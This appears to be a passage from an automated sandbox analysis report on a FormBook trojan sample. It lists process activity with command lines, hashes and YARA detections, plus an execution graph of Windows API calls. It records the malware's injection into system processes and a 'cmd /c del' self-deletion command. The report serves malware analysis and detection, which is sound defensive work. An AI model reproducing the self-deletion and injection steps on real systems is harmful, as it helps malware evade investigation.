                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:9
                                                                                                  Start time:15:45:18
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\ipconfig.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:ipconfig /renew
                                                                                                  Imagebase:0x3a0000
                                                                                                  File size:29'184 bytes
                                                                                                  MD5 hash:3A3B9A5E00EF6A3F83BF300E2B6B67BB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:13
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Imagebase:0xf0000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:14
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  Imagebase:0xc00000
                                                                                                  File size:45'984 bytes
                                                                                                  MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.1647692265.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:moderate
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:15
                                                                                                  Start time:15:45:22
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\explorer.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\Explorer.EXE
                                                                                                  Imagebase:0x7ff62d7d0000
                                                                                                  File size:5'141'208 bytes
                                                                                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: Windows_Trojan_Formbook_772cc62d, Description: unknown, Source: 0000000F.00000002.3875577794.00000000106B5000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  Reputation:moderate
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:16
                                                                                                  Start time:15:45:26
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3843232274.0000000003390000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3842416015.0000000002B50000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000002.3842825880.0000000002F50000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                  Reputation:high
                                                                                                  Has exited:false

                                                                                                  General

                                                                                                  Target ID:17
                                                                                                  Start time:15:45:29
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                                                                                                  Imagebase:0xa40000
                                                                                                  File size:236'544 bytes
                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high
                                                                                                  Has exited:true

                                                                                                  General

                                                                                                  Target ID:18
                                                                                                  Start time:15:45:29
                                                                                                  Start date:06/10/2023
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff6ee680000
                                                                                                  File size:862'208 bytes
                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                  Has elevated privileges:false
                                                                                                  Has administrator privileges:false
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Has exited:true

                                                                                                  Disassembly

                                                                                                  Reset < >

                                                                                                    Execution Graph

                                                                                                    Execution Coverage:10.1%
                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                    Signature Coverage:9.6%
                                                                                                    Total number of Nodes:1599
                                                                                                    Total number of Limit Nodes:47
                                                                                                    execution_graph 25517 51e455 14 API calls ___delayLoadHelper2@8 23560 51cd58 23561 51ce22 23560->23561 23567 51cd7b _wcschr 23560->23567 23573 51c793 _wcslen _wcsrchr 23561->23573 23588 51d78f 23561->23588 23564 51d40a 23566 511fbb CompareStringW 23566->23567 23567->23561 23567->23566 23568 51ca67 SetWindowTextW 23568->23573 23573->23564 23573->23568 23574 51c855 SetFileAttributesW 23573->23574 23586 51c86f _abort _wcslen 23573->23586 23613 511fbb CompareStringW 23573->23613 23614 51a64d GetCurrentDirectoryW 23573->23614 23619 50a5d1 6 API calls 23573->23619 23620 50a55a FindClose 23573->23620 23621 51b48e 76 API calls 2 library calls 23573->23621 23622 523e3e 23573->23622 23635 51b314 ExpandEnvironmentStringsW 23573->23635 23576 51c90f GetFileAttributesW 23574->23576 23574->23586 23576->23573 23578 51c921 DeleteFileW 23576->23578 23578->23573 23580 51c932 23578->23580 23579 51cc31 GetDlgItem SetWindowTextW SendMessageW 23579->23586 23616 504092 23580->23616 23583 51cc71 SendMessageW 23583->23573 23584 51c967 MoveFileW 23584->23573 23585 51c97f MoveFileExW 23584->23585 23585->23573 23586->23573 23586->23579 23586->23583 23587 51c8eb SHFileOperationW 23586->23587 23615 50b991 51 API calls 3 library calls 23586->23615 23587->23576 23590 51d799 _abort _wcslen 23588->23590 23589 51d9e7 23589->23573 23590->23589 23591 51d8a5 23590->23591 23592 51d9c0 23590->23592 23645 511fbb CompareStringW 23590->23645 23636 50a231 23591->23636 23592->23589 23596 51d9de ShowWindow 23592->23596 23596->23589 23597 51d8d9 ShellExecuteExW 23597->23589 23598 51d8ec 23597->23598 23601 51d910 IsWindowVisible 23598->23601 23602 51d925 WaitForInputIdle 23598->23602 23603 51d97b CloseHandle 23598->23603 23600 51d8d1 23600->23597 23601->23602 23604 51d91b ShowWindow 23601->23604 23639 51dc3b WaitForSingleObject 23602->23639 23606 51d989 23603->23606 23608 51d994 23603->23608 23604->23602 23647 511fbb CompareStringW 23606->23647 23608->23592 23609 51d93d 23609->23603 23610 51d950 GetExitCodeProcess 23609->23610 23610->23603 23611 51d963 23610->23611 23611->23603 23613->23573 23614->23573 23615->23586 23662 504065 23616->23662 23619->23573 23620->23573 23621->23573 23623 528e54 23622->23623 23624 528e61 23623->23624 23625 528e6c 23623->23625 23749 528e06 23624->23749 23627 528e74 23625->23627 23633 528e7d __dosmaperr 23625->23633 23628 528dcc _free 20 API calls 23627->23628 23631 528e69 23628->23631 23629 528e82 23756 5291a8 20 API calls __dosmaperr 23629->23756 23630 528ea7 HeapReAlloc 23630->23631 23630->23633 23631->23573 23633->23629 23633->23630 23757 527a5e 7 API calls 2 library calls 23633->23757 23635->23573 23648 50a243 23636->23648 23640 51dc56 23639->23640 23644 51dc9b 23639->23644 23641 51dc59 PeekMessageW 23640->23641 23642 51dc6b GetMessageW TranslateMessage DispatchMessageW 23641->23642 23643 51dc8c WaitForSingleObject 23641->23643 23642->23643 23643->23641 23643->23644 23644->23609 23645->23591 23646 50b6c4 GetFullPathNameW GetFullPathNameW GetCurrentDirectoryW 23646->23600 23647->23608 23656 51ec50 23648->23656 23651 50a261 23658 50bb03 23651->23658 23652 50a23a 23652->23597 23652->23646 23654 50a275 23654->23652 23655 50a279 GetFileAttributesW 23654->23655 23655->23652 23657 50a250 GetFileAttributesW 23656->23657 23657->23651 23657->23652 23659 50bb10 _wcslen 23658->23659 23660 50bbb8 GetCurrentDirectoryW 23659->23660 23661 50bb39 _wcslen 23659->23661 23660->23661 23661->23654 23663 50407c __vsnwprintf_l 23662->23663 23666 525fd4 23663->23666 23669 524097 23666->23669 23670 5240d7 23669->23670 23671 5240bf 23669->23671 23670->23671 23672 5240df 23670->23672 23686 5291a8 20 API calls __dosmaperr 23671->23686 23688 524636 23672->23688 23675 5240c4 23687 529087 26 API calls _abort 23675->23687 23680 504086 GetFileAttributesW 23680->23580 23680->23584 23681 524167 23697 5249e6 51 API calls 4 library calls 23681->23697 23684 524172 23698 5246b9 20 API calls _free 23684->23698 23685 5240cf 23699 51fbbc 23685->23699 23686->23675 23687->23685 23689 524653 23688->23689 23690 5240ef 23688->23690 23689->23690 23706 5297e5 GetLastError 23689->23706 23696 524601 20 API calls 2 library calls 23690->23696 23692 524674 23726 52993a 38 API calls __fassign 23692->23726 23694 52468d 23727 529967 38 API calls __fassign 23694->23727 23696->23681 23697->23684 23698->23685 23700 51fbc5 IsProcessorFeaturePresent 23699->23700 23701 51fbc4 23699->23701 23703 51fc07 23700->23703 23701->23680 23748 51fbca SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 23703->23748 23705 51fcea 23705->23680 23707 5297fb 23706->23707 23710 529801 23706->23710 23728 52ae5b 11 API calls 2 library calls 23707->23728 23712 529850 SetLastError 23710->23712 23729 52b136 23710->23729 23712->23692 23713 52981b 23736 528dcc 23713->23736 23716 529830 23716->23713 23718 529837 23716->23718 23717 529821 23719 52985c SetLastError 23717->23719 23743 529649 20 API calls __dosmaperr 23718->23743 23744 528d24 38 API calls _abort 23719->23744 23721 529842 23723 528dcc _free 20 API calls 23721->23723 23725 529849 23723->23725 23725->23712 23725->23719 23726->23694 23727->23690 23728->23710 23734 52b143 __dosmaperr 23729->23734 23730 52b183 23746 5291a8 20 API calls __dosmaperr 23730->23746 23731 52b16e RtlAllocateHeap 23732 529813 23731->23732 23731->23734 23732->23713 23742 52aeb1 11 API calls 2 library calls 23732->23742 23734->23730 23734->23731 23745 527a5e 7 API calls 2 library calls 23734->23745 23737 528dd7 RtlFreeHeap 23736->23737 23738 528e00 __dosmaperr 23736->23738 23737->23738 23739 528dec 23737->23739 23738->23717 23747 5291a8 20 API calls __dosmaperr 23739->23747 23741 528df2 GetLastError 23741->23738 23742->23716 23743->23721 23745->23734 23746->23732 23747->23741 23748->23705 23750 528e44 23749->23750 23755 528e14 __dosmaperr 23749->23755 23759 5291a8 20 API calls __dosmaperr 23750->23759 23752 528e2f RtlAllocateHeap 23753 528e42 23752->23753 23752->23755 23753->23631 23755->23750 23755->23752 23758 527a5e 7 API calls 2 library calls 23755->23758 23756->23631 23757->23633 23758->23755 23759->23753 25519 51a440 GdipCloneImage GdipAlloc 25520 523a40 5 API calls _ValidateLocalCookies 25566 531f40 CloseHandle 23806 51e44b 23807 51e3f4 23806->23807 23807->23806 23808 51e85d ___delayLoadHelper2@8 14 API calls 23807->23808 23808->23807 25522 51a070 10 API calls 25524 51b270 99 API calls 25569 501f72 129 API calls __EH_prolog 23856 509a74 23859 509a7e 23856->23859 23857 509b9d SetFilePointer 23858 509bb6 GetLastError 23857->23858 23862 509ab1 23857->23862 23858->23862 23859->23857 23861 509b79 23859->23861 23859->23862 23863 50981a 23859->23863 23861->23857 23864 509833 23863->23864 23869 509e80 23864->23869 23866 509865 23866->23861 23868 509e80 79 API calls 23868->23866 23870 509e92 23869->23870 23875 509ea5 23869->23875 23872 509837 23870->23872 23878 506d5b 77 API calls 23870->23878 23871 509eb8 SetFilePointer 23871->23872 23874 509ed4 GetLastError 23871->23874 23872->23868 23874->23872 23876 509ede 23874->23876 23875->23871 23875->23872 23876->23872 23879 506d5b 77 API calls 23876->23879 23878->23875 23879->23872 25525 501075 84 API calls 23881 509f7a 23882 509f88 23881->23882 23883 509f8f 23881->23883 23884 509f9c GetStdHandle 23883->23884 23891 509fab 23883->23891 23884->23891 23885 50a003 WriteFile 23885->23891 23886 509fd4 WriteFile 23887 509fcf 23886->23887 23886->23891 23887->23886 23887->23891 23889 50a095 23893 506e98 77 API calls 23889->23893 23891->23882 23891->23885 23891->23886 23891->23887 23891->23889 23892 506baa 78 API calls 23891->23892 23892->23891 23893->23882 24797 51e569 24798 51e517 24797->24798 24799 51e85d ___delayLoadHelper2@8 14 API calls 24798->24799 24799->24798 24800 528268 24811 52bb30 24800->24811 24806 528dcc _free 20 API calls 24807 5282ba 24806->24807 24808 528dcc _free 20 API calls 24810 528285 24808->24810 24809 528290 24809->24808 24810->24806 24812 52827a 24811->24812 24813 52bb39 24811->24813 24815 52bf30 GetEnvironmentStringsW 24812->24815 24828 52ba27 24813->24828 24816 52bf47 24815->24816 24817 52bf9a 24815->24817 24818 52bf4d WideCharToMultiByte 24816->24818 24819 52bfa3 FreeEnvironmentStringsW 24817->24819 24820 52827f 24817->24820 24818->24817 24821 52bf69 24818->24821 24819->24820 24820->24810 24827 5282c0 26 API calls 4 library calls 24820->24827 24822 528e06 __vsnwprintf_l 21 API calls 24821->24822 24823 52bf6f 24822->24823 24824 52bf8c 24823->24824 24825 52bf76 WideCharToMultiByte 24823->24825 24826 528dcc _free 20 API calls 24824->24826 24825->24824 24826->24817 24827->24809 24829 5297e5 _abort 38 API calls 24828->24829 24830 52ba34 24829->24830 24848 52bb4e 24830->24848 24832 52ba3c 24857 52b7bb 24832->24857 24835 528e06 __vsnwprintf_l 21 API calls 24836 52ba64 24835->24836 24838 52ba96 24836->24838 24864 52bbf0 24836->24864 24840 528dcc _free 20 API calls 24838->24840 24842 52ba53 24840->24842 24841 52ba91 24874 5291a8 20 API calls __dosmaperr 24841->24874 24842->24812 24844 52bada 24844->24838 24875 52b691 26 API calls 24844->24875 24845 52baae 24845->24844 24846 528dcc _free 20 API calls 24845->24846 24846->24844 24849 52bb5a __FrameHandler3::FrameUnwindToState 24848->24849 24850 5297e5 _abort 38 API calls 24849->24850 24855 52bb64 24850->24855 24852 52bbe8 _abort 24852->24832 24855->24852 24856 528dcc _free 20 API calls 24855->24856 24876 528d24 38 API calls _abort 24855->24876 24877 52ac31 EnterCriticalSection 24855->24877 24878 52bbdf LeaveCriticalSection _abort 24855->24878 24856->24855 24858 524636 __fassign 38 API calls 24857->24858 24859 52b7cd 24858->24859 24860 52b7ee 24859->24860 24861 52b7dc GetOEMCP 24859->24861 24862 52b805 24860->24862 24863 52b7f3 GetACP 24860->24863 24861->24862 24862->24835 24862->24842 24863->24862 24865 52b7bb 40 API calls 24864->24865 24866 52bc0f 24865->24866 24868 52bc60 IsValidCodePage 24866->24868 24871 52bc16 24866->24871 24873 52bc85 _abort 24866->24873 24867 51fbbc _ValidateLocalCookies 5 API calls 24869 52ba89 24867->24869 24870 52bc72 GetCPInfo 24868->24870 24868->24871 24869->24841 24869->24845 24870->24871 24870->24873 24871->24867 24879 52b893 GetCPInfo 24873->24879 24874->24838 24875->24838 24877->24855 24878->24855 24880 52b8cd 24879->24880 24888 52b977 24879->24888 24889 52c988 24880->24889 24882 51fbbc _ValidateLocalCookies 5 API calls 24884 52ba23 24882->24884 24884->24871 24887 52ab78 __vsnwprintf_l 43 API calls 24887->24888 24888->24882 24890 524636 __fassign 38 API calls 24889->24890 24891 52c9a8 MultiByteToWideChar 24890->24891 24893 52c9e6 24891->24893 24894 52ca7e 24891->24894 24896 528e06 __vsnwprintf_l 21 API calls 24893->24896 24900 52ca07 _abort __vsnwprintf_l 24893->24900 24895 51fbbc _ValidateLocalCookies 5 API calls 24894->24895 24897 52b92e 24895->24897 24896->24900 24903 52ab78 24897->24903 24898 52ca78 24908 52abc3 20 API calls _free 24898->24908 24900->24898 24901 52ca4c MultiByteToWideChar 24900->24901 24901->24898 24902 52ca68 GetStringTypeW 24901->24902 24902->24898 24904 524636 __fassign 38 API calls 24903->24904 24905 52ab8b 24904->24905 24909 52a95b 24905->24909 24908->24894 24910 52a976 __vsnwprintf_l 24909->24910 24911 52a99c MultiByteToWideChar 24910->24911 24912 52a9c6 24911->24912 24923 52ab50 24911->24923 24913 52a9e7 __vsnwprintf_l 24912->24913 24916 528e06 __vsnwprintf_l 21 API calls 24912->24916 24917 52aa30 MultiByteToWideChar 24913->24917 24918 52aa9c 24913->24918 24914 51fbbc _ValidateLocalCookies 5 API calls 24915 52ab63 24914->24915 24915->24887 24916->24913 24917->24918 24919 52aa49 24917->24919 24945 52abc3 20 API calls _free 24918->24945 24936 52af6c 24919->24936 24923->24914 24924 52aa73 24924->24918 24927 52af6c __vsnwprintf_l 11 API calls 24924->24927 24925 52aaab 24928 528e06 __vsnwprintf_l 21 API calls 24925->24928 24931 52aacc __vsnwprintf_l 24925->24931 24926 52ab41 24944 52abc3 20 API calls _free 24926->24944 24927->24918 24928->24931 24929 52af6c __vsnwprintf_l 11 API calls 24932 52ab20 24929->24932 24931->24926 24931->24929 24932->24926 24933 52ab2f WideCharToMultiByte 24932->24933 24933->24926 24934 52ab6f 24933->24934 24946 52abc3 20 API calls _free 24934->24946 24937 52ac98 __dosmaperr 5 API calls 24936->24937 24938 52af93 24937->24938 24941 52af9c 24938->24941 24947 52aff4 10 API calls 3 library calls 24938->24947 24940 52afdc LCMapStringW 24940->24941 24942 51fbbc _ValidateLocalCookies 5 API calls 24941->24942 24943 52aa60 24942->24943 24943->24918 24943->24924 24943->24925 24944->24918 24945->24923 24946->24918 24947->24940 25527 51c793 108 API calls 5 library calls 25571 527f6e 52 API calls 3 library calls 25572 501710 86 API calls 25573 51ad10 73 API calls 25530 51a400 GdipDisposeImage GdipFree 25531 51d600 70 API calls 25532 526000 QueryPerformanceFrequency QueryPerformanceCounter 25534 52f200 51 API calls 25577 522900 6 API calls 4 library calls 25579 52a700 21 API calls 25580 51f530 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 25581 51ff30 LocalFree 25536 52c030 GetProcessHeap 25537 51c220 93 API calls _swprintf 25539 52f421 21 API calls __vsnwprintf_l 25540 501025 29 API calls 23470 51e1d1 14 API calls ___delayLoadHelper2@8 25541 51f4d3 20 API calls 25584 52a3d0 21 API calls 2 library calls 25585 532bd0 VariantClear 23473 5010d5 23478 505abd 23473->23478 23479 505ac7 __EH_prolog 23478->23479 23485 50b505 23479->23485 23481 505ad3 23491 505cac GetCurrentProcess GetProcessAffinityMask 23481->23491 23486 50b50f __EH_prolog 23485->23486 23492 50f1d0 82 API calls 23486->23492 23488 50b521 23493 50b61e 23488->23493 23492->23488 23494 50b630 _abort 23493->23494 23497 5110dc 23494->23497 23500 51109e GetCurrentProcess GetProcessAffinityMask 23497->23500 23501 50b597 23500->23501 23501->23481 23502 51e2d7 23503 51e1db 23502->23503 23505 51e85d 23503->23505 23531 51e5bb 23505->23531 23507 51e86d 23508 51e8ca 23507->23508 23517 51e8ee 23507->23517 23509 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23508->23509 23510 51e8d5 RaiseException 23509->23510 23511 51eac3 23510->23511 23511->23503 23512 51e966 LoadLibraryExA 23513 51e9c7 23512->23513 23514 51e979 GetLastError 23512->23514 23516 51e9d9 23513->23516 23518 51e9d2 FreeLibrary 23513->23518 23519 51e9a2 23514->23519 23520 51e98c 23514->23520 23515 51ea37 GetProcAddress 23522 51ea47 GetLastError 23515->23522 23526 51ea95 23515->23526 23516->23515 23516->23526 23517->23512 23517->23513 23517->23516 23517->23526 23518->23516 23521 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23519->23521 23520->23513 23520->23519 23523 51e9ad RaiseException 23521->23523 23524 51ea5a 23522->23524 23523->23511 23524->23526 23527 51e7fb DloadReleaseSectionWriteAccess 6 API calls 23524->23527 23540 51e7fb 23526->23540 23528 51ea7b RaiseException 23527->23528 23529 51e5bb ___delayLoadHelper2@8 6 API calls 23528->23529 23530 51ea92 23529->23530 23530->23526 23532 51e5c7 23531->23532 23533 51e5ed 23531->23533 23548 51e664 23532->23548 23533->23507 23535 51e5cc 23536 51e5e8 23535->23536 23551 51e78d 23535->23551 23556 51e5ee GetModuleHandleW GetProcAddress GetProcAddress 23536->23556 23539 51e836 23539->23507 23541 51e80d 23540->23541 23542 51e82f 23540->23542 23543 51e664 DloadReleaseSectionWriteAccess 3 API calls 23541->23543 23542->23511 23544 51e812 23543->23544 23545 51e82a 23544->23545 23547 51e78d DloadProtectSection 3 API calls 23544->23547 23559 51e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23545->23559 23547->23545 23557 51e5ee GetModuleHandleW GetProcAddress GetProcAddress 23548->23557 23550 51e669 23550->23535 23554 51e7a2 DloadProtectSection 23551->23554 23552 51e7a8 23552->23536 23553 51e7dd VirtualProtect 23553->23552 23554->23552 23554->23553 23558 51e6a3 VirtualQuery GetSystemInfo 23554->23558 23556->23539 23557->23550 23558->23553 23559->23542 25543 520ada 51 API calls 2 library calls 25587 51b5c0 100 API calls 25588 5177c0 119 API calls 25589 51ffc0 RaiseException _com_raise_error _com_error::_com_error 23763 51dec2 23764 51decf 23763->23764 23771 50e617 23764->23771 23767 504092 _swprintf 51 API calls 23768 51def1 SetDlgItemTextW 23767->23768 23775 51b568 PeekMessageW 23768->23775 23772 50e627 23771->23772 23780 50e648 23772->23780 23776 51b583 GetMessageW 23775->23776 23777 51b5bc 23775->23777 23778 51b599 IsDialogMessageW 23776->23778 23779 51b5a8 TranslateMessage DispatchMessageW 23776->23779 23778->23777 23778->23779 23779->23777 23786 50d9b0 23780->23786 23783 50e645 23783->23767 23784 50e66b LoadStringW 23784->23783 23785 50e682 LoadStringW 23784->23785 23785->23783 23791 50d8ec 23786->23791 23788 50d9cd 23789 50d9e2 23788->23789 23799 50d9f0 26 API calls 23788->23799 23789->23783 23789->23784 23792 50d904 23791->23792 23797 50d984 _strncpy 23791->23797 23794 50d928 23792->23794 23800 511da7 WideCharToMultiByte 23792->23800 23798 50d959 23794->23798 23801 50e5b1 50 API calls __vsnprintf 23794->23801 23797->23788 23802 526159 26 API calls 3 library calls 23798->23802 23799->23789 23800->23794 23801->23798 23802->23797 25545 5162ca 124 API calls __InternalCxxFrameHandler 25547 505ef0 82 API calls 25591 5095f0 80 API calls 25592 51fd4f 9 API calls 2 library calls 23810 5298f0 23818 52adaf 23810->23818 23813 529904 23815 52990c 23816 529919 23815->23816 23826 529920 11 API calls 23815->23826 23827 52ac98 23818->23827 23821 52adee TlsAlloc 23822 52addf 23821->23822 23823 51fbbc _ValidateLocalCookies 5 API calls 23822->23823 23824 5298fa 23823->23824 23824->23813 23825 529869 20 API calls 2 library calls 23824->23825 23825->23815 23826->23813 23828 52acc8 23827->23828 23831 52acc4 23827->23831 23828->23821 23828->23822 23829 52ace8 23829->23828 23832 52acf4 GetProcAddress 23829->23832 23831->23828 23831->23829 23834 52ad34 23831->23834 23833 52ad04 __dosmaperr 23832->23833 23833->23828 23835 52ad55 LoadLibraryExW 23834->23835 23840 52ad4a 23834->23840 23836 52ad72 GetLastError 23835->23836 23837 52ad8a 23835->23837 23836->23837 23838 52ad7d LoadLibraryExW 23836->23838 23839 52ada1 FreeLibrary 23837->23839 23837->23840 23838->23837 23839->23840 23840->23831 23842 52abf0 23843 52abfb 23842->23843 23845 52ac24 23843->23845 23846 52ac20 23843->23846 23848 52af0a 23843->23848 23855 52ac50 DeleteCriticalSection 23845->23855 23849 52ac98 __dosmaperr 5 API calls 23848->23849 23850 52af31 23849->23850 23851 52af4f InitializeCriticalSectionAndSpinCount 23850->23851 23852 52af3a 23850->23852 23851->23852 23853 51fbbc _ValidateLocalCookies 5 API calls 23852->23853 23854 52af66 23853->23854 23854->23843 23855->23846 25548 5288f0 7 API calls ___scrt_uninitialize_crt 25550 522cfb 38 API calls 4 library calls 23895 51b7e0 23896 51b7ea __EH_prolog 23895->23896 24065 501316 23896->24065 23899 51b841 23900 51b82a 23900->23899 23903 51b838 23900->23903 23904 51b89b 23900->23904 23901 51bf0f 24138 51d69e 23901->24138 23907 51b878 23903->23907 23908 51b83c 23903->23908 23906 51b92e GetDlgItemTextW 23904->23906 23912 51b8b1 23904->23912 23906->23907 23911 51b96b 23906->23911 23907->23899 23915 51b95f EndDialog 23907->23915 23908->23899 23918 50e617 53 API calls 23908->23918 23909 51bf38 23913 51bf41 SendDlgItemMessageW 23909->23913 23914 51bf52 GetDlgItem SendMessageW 23909->23914 23910 51bf2a SendMessageW 23910->23909 23916 51b980 GetDlgItem 23911->23916 24063 51b974 23911->24063 23917 50e617 53 API calls 23912->23917 23913->23914 24156 51a64d GetCurrentDirectoryW 23914->24156 23915->23899 23920 51b994 SendMessageW SendMessageW 23916->23920 23921 51b9b7 SetFocus 23916->23921 23922 51b8ce SetDlgItemTextW 23917->23922 23923 51b85b 23918->23923 23920->23921 23925 51b9c7 23921->23925 23938 51b9e0 23921->23938 23926 51b8d9 23922->23926 24176 50124f SHGetMalloc 23923->24176 23924 51bf82 GetDlgItem 23928 51bfa5 SetWindowTextW 23924->23928 23929 51bf9f 23924->23929 